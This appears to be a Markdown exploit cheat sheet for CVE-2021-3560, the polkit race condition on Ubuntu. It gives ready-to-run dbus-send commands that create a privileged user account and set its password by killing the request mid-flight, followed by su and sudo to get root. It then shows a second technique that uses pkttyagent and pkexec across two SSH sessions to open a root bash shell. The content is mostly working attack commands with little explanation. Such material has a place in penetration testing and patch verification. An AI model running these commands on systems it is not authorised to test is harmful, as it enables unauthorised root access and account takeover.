41 lines
1.3 KiB
Markdown
41 lines
1.3 KiB
Markdown
# CVE-2021-3560
|
|
|
|
* Exploit `< 0.105-26ubuntu1.1`
|
|
|
|
|
|
## Racing Condition
|
|
* Request creation of account via dbus message and `pkexec`. sleep time is variable.
|
|
```sh
|
|
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
|
|
```
|
|
* Create password via `openssl passwd -6 -salt salt password123`
|
|
```sh
|
|
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
|
|
```
|
|
* Request is killed after polkits receives it
|
|
|
|
* Polkit requests uid of user who sent the message, which has been deleted
|
|
* Error will be thrown
|
|
* Uid turns to root afterwards
|
|
* Request succeeds
|
|
|
|
* `su user1` and `sudo -s`
|
|
|
|
|
|
# Priv Esc with Two Sessions
|
|
* User has to be member of group `sudo`
|
|
* Open two ssh sessions
|
|
* In session one check the PID
|
|
```sh
|
|
echo $$
|
|
```
|
|
* In the other session
|
|
```sh
|
|
pkttyagent --process <PID of s1>
|
|
```
|
|
* In session one do
|
|
```sh
|
|
pkexec "/bin/bash"
|
|
```
|
|
* Enter password in session two
|